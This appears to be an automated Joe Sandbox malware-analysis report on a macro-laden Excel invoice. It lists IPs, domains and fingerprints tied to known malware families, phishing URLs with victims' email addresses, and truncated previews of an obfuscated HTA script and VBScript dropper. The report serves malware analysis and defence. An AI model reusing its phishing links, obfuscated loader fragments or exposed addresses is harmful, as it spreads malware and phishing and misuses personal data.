URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.95.235.29	Enquiry 230424.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Quotation 20242204.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Quotation 20241804.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.FileRepMalware.21353.16266.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Quotation.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	PROFORMA INVOICE.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	PI-BD2403001.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Document.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Quotation.exe	Get hash	malicious	Remcos, DBatLoader	Browse
151.101.1.137	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse
	16547.js	Get hash	malicious	MassLogger RAT	Browse
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx	Get hash	malicious	Remcos	Browse
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse
	1013911.js	Get hash	malicious	FormBook	Browse
	http://itsecurityupdate.com	Get hash	malicious	Unknown	Browse
	https://www.payment.token2049.com/page/3156941?widget=true&	Get hash	malicious	Unknown	Browse
	https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174d	Get hash	malicious	Unknown	Browse
	https://www.postman.com/postman-account/	Get hash	malicious	Unknown	Browse
54.150.207.131	Document.xla.xlsx	Get hash	malicious	Unknown	Browse
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse
	FR65 380 071 464.docx	Get hash	malicious	Unknown	Browse
	FR65 380 071 464.docx	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudinary.map.fastly.net	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	151.101.129.137
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	151.101.193.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.65.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.65.137
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	151.101.1.137
	xxx.doc	Get hash	malicious	Unknown	Browse	151.101.1.137
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	151.101.193.137
	atthings.doc	Get hash	malicious	Remcos	Browse	151.101.65.137
	16547.js	Get hash	malicious	MassLogger RAT	Browse	151.101.1.137
short.ruksk.com	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	54.150.207.131
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	54.150.207.131
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	54.150.207.131
	FR65 380 071 464.docx	Get hash	malicious	Unknown	Browse	54.150.207.131
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	54.150.207.131
paste.ee	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.21.84.67
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	188.114.96.6
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	172.67.187.200
	ithgreat.doc	Get hash	malicious	Unknown	Browse	188.114.97.6
	xxx.doc	Get hash	malicious	Unknown	Browse	188.114.96.6
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.6
	NewOrder12052024.js	Get hash	malicious	Remcos	Browse	172.67.187.200
	fUHl7rElXU.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	151.101.1.108
	https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	EFT Remittance_(Deerequipment)CQDM.html	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://vcsfi.kidsavancados.com/	Get hash	malicious	Captcha Phish	Browse	151.101.66.137
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	151.101.64.84
	https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com	Get hash	malicious	Captcha Phish	Browse	151.101.194.137
AMAZON-02US	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	54.150.207.131
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	13.227.8.47
	wheiuwa4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	https://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/	Get hash	malicious	Unknown	Browse	108.158.75.45
	arm7.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	sh4.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	x86.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	6dKYHqbvOm.exe	Get hash	malicious	Njrat	Browse	35.158.159.254
AS-COLOCROSSINGUS	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Josho.arm.elf	Get hash	malicious	Unknown	Browse	104.170.167.20
	hax.arm7.elf	Get hash	malicious	Mirai	Browse	107.172.219.218
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	192.3.220.6
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	172.245.142.60
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	192.3.101.9
	FACTURA.xlsx	Get hash	malicious	Remcos	Browse	192.210.150.26
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	172.245.142.60
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.29
AS-CHOOPAUS	rAlZ2pGOUn.dll	Get hash	malicious	Unknown	Browse	45.77.204.56
	rAlZ2pGOUn.dll	Get hash	malicious	Unknown	Browse	45.77.204.56
	bot.m68k.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62
	bot.arm.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	136.244.92.62
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62
	bot.mpsl.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62
	bot.mips.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	136.244.92.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	151.101.1.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	151.101.1.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.1.137
	Payment Confirmation..docm	Get hash	malicious	Snake Keylogger	Browse	151.101.1.137
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	151.101.1.137
	Estado de cuenta.xls	Get hash	malicious	XenoRAT	Browse	151.101.1.137
	Estado de cuenta.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	Estado_de_cuenta.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	atthings.doc	Get hash	malicious	Remcos	Browse	151.101.1.137
7dcce5b76c8b17472d024758970a406b	tqkdMdv2zO.doc	Get hash	malicious	XenoRAT	Browse	45.63.94.214 54.150.207.131
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	45.63.94.214 54.150.207.131
	Estado.de.cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	45.63.94.214 54.150.207.131
	Estado.de.cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	45.63.94.214 54.150.207.131
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	45.63.94.214 54.150.207.131
	Estado.de.cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	45.63.94.214 54.150.207.131
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	45.63.94.214 54.150.207.131
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.63.94.214 54.150.207.131
	FACTURA.xlsx	Get hash	malicious	Remcos	Browse	45.63.94.214 54.150.207.131
	Estado_de_cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	45.63.94.214 54.150.207.131

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0018885380473555064
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE+//ql:/M/xT02zHql
MD5:	125B296DD690A991FDEFA84B0C1C614C
SHA1:	48E0FE2F932645D2788E99F6EE68B9BED1586A01
SHA-256:	31AB9BAEFCD31A807B1FDE454C944B77696F7DFBD22CF7EC473A09166F837B2C
SHA-512:	A6DA96C8E470447CDD727DC54A25050D08BFCA67E3B62077C06AB7FBEFA04193BB9653912E85B3D68CB7F8CF1372076B28CD2EA1C5D68324FBF39108BFDFB2BA
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15189
Entropy (8bit):	5.0343247648743
Encrypted:	false
SSDEEP:	384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5:	7BC3FB6565E144A52C5F44408D5D80DF
SHA1:	C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256:	EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512:	D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Category:	modified
Size (bytes):	83281
Entropy (8bit):	2.463259789391332
Encrypted:	false
SSDEEP:	768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAbvOx7ze2pe2Ju2x4/mlpu6ae28RWHTuQBwxW:tD
MD5:	76277AB4BDE108FED474724B88AD0E39
SHA1:	F73BA378275E5BC2492E53B63C96C22F35599FFC
SHA-256:	62DB7E02B51B89F767C5740BB8569668DDCF134B2865959D9FC7A749209D0539
SHA-512:	7A914101C566FCF41B596CEAFDDE08674A979C9C20731D2E9A1DD0D58CF360204BCA82B4680FAA684806A5E7E4E88F285CB63BF414FD613878F7281CF60FC5A1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta, Author: Joe Security
Preview:	<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3358), with CRLF line terminators
Category:	dropped
Size (bytes):	79694
Entropy (8bit):	5.554379657334594
Encrypted:	false
SSDEEP:	1536:qoSgAYHTLQ3OnRKRzI7f0oSgAYHTLQ3OnRKRzI7aoSgAYHTLQ3OnRKRzI7C:xFAYzL/RYwFAYzL/RYQFAYzL/RYx
MD5:	F36EA4021BF4ED07112559BE10BA67B1
SHA1:	91949A69D56929B133DD2E5001E66932C5FF7707
SHA-256:	8E3C100F39A386639099EDF1D8B07C07DC28D3BA9E54345A7F6AD0647042AAD3
SHA-512:	28344961EB0E4FBD183E8DC07EA35F6B23BA246A199BEF32E1AD85ADD47C47349AFA0541B8D0EC4ED6572B9A5FCC1AD8F7C143775E8DCA691582DF2EECC7119B
Malicious:	false
Preview:	.. ..ZhPiCcCcPNaziiL = "bkWfnkcLblptHaB"..ijcuNUuKCiNcWOP = "ltUGBzGouUzmWUK"..SKdemlZfbqBRKua = "KvuaKWPGmWoLcZx"....mKGWivlNPfGiALU = "KUqxhpBLtKmCKnR"..aNpLuOzbprimWWJ = "CmqNnKLdApLIcjx"..crUvtpLUgPWCWWN = "WchbvLcPmPZpnih"..iKpkKKpiPLCdixW = "eLUZeGGnWNHGtOG"..PZrBbGRmLCmcLxJ = "kLWWGhLPLCnWKmG"..WjlaWWALLLBeSWP = "LKGULLgaoUZoLZK"..WiedLfALWLoAbKn = "cKesGGWZoPpCucC"..LQkcZWWCbGLvUlf = "eUAzWcKuctCcLcR"..kLqxhtPhnvknbap = "UKWtniLJxLiWhGu"..fBWlotcLczLePPi = "iAzrhtbtezxtCsL"..muUiLmNrGkOCNcb = "LhmWdcubffhbWtd"..pWuGGnLLAeKiWTW = "IcuemgAfWKTNCIG"....JLLpqfuKtzikKeK = "iWPidNGLaKWWztL"..WhLdUliNKLedlCu = "QloZOWupGbeNCKa"..LConKosWRzKonpA = "LncPcKPOAPhjJfc"..HKtWQKWOPkeBdnB = "qSpKGoqioWfeLWW"..vBfpLWcWRqjaHWW = "BNpxdoWULvcPWqA"..fWdAscoKeKjcaPA = "KBWCmcdbmWWCTCL"..hiuniKeKBhZRUca = "lUknLdcchUWTani"..GPopKWAWcTNfeGA = "sIKPLKRLmThIKdi"..qPLazLkKWZWWiGr = "GRjtckNWcLecWek"....oKbxHeWppNqofcs = "LfscZobcCGLPZNm"..KnWpRaiAeJLfkNL = "ihKAbhoCxrPnTGC"..vWailLkKhbKkfjh = "RTffL

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Dec 11 09:54:25 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.982202661488926
Encrypted:	false
SSDEEP:	24:Hue9E2U+cc0XdH6QwKdNWI+ycuZhNnakSJPNnqSqd:GM0tCKd41ulna3rqSK
MD5:	0A5DD785520C7745CC0F47D6540D76FF
SHA1:	45EABF79FF8E7EA2E39EB0F1B84D1A80B7F3F5E3
SHA-256:	F15DB123365CC7D9444ABBF223116F6FA10E2C79D96AB4EB944D5C26C5027E39
SHA-512:	9ADD44D90B28EA5E9213EB8B1C8B27C6ACC52375C4C7389A12B03F23E72201442A02A8D700C681BB038CD3F1BD99E38E31CD7C86356F0C61CEABFC44CF478785
Malicious:	false
Preview:	L...QaYg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP...................k^N..D"..)............4.......C:\Users\user\AppData\Local\Temp\RES254C.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.t.t.o.1.a.w.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 11 05:50:39 2024, Security: 1
Entropy (8bit):	7.760891931738364
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Invoice A037.xls
File size:	1'072'128 bytes
MD5:	78c7227d02510326cd88eb38003b252e
SHA1:	742a16e734f3e3ede2f8acdbc89aef3962c4f338
SHA256:	41cf481a165a9e4c70bcd9170b283912783b18e5b8af8a21e76cb0f175d167c9
SHA512:	404b54b509f37e50f7ad5a7f7adf942f7daa03810bbc6452b5c4173e7a1e580616094e3c6b419eb1f729f989572ad7c44b56a1494c58a22ef6f2f1f8df99d29c
SSDEEP:	12288:idmzHJEUiOIBUzMTSyD3DERnLRmF8DGEP3xpsAQx1Zj+jVEPrgtdXGK23mx0ztsq:7BajbARM8138Z+jQrA2Wu5sTYORyx
TLSH:	3735F1D1B78D9B12D655023935F387AE1721AC13E952427B32F8731E2AF7AE08543F86
File Content Preview:	........................>.......................................................@...A...B...C...p...q...r.........../...........d.......f......................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-12-11 05:50:39
Creating Application:	Microsoft Excel
Security:	1

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

General
Stream Path:	MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
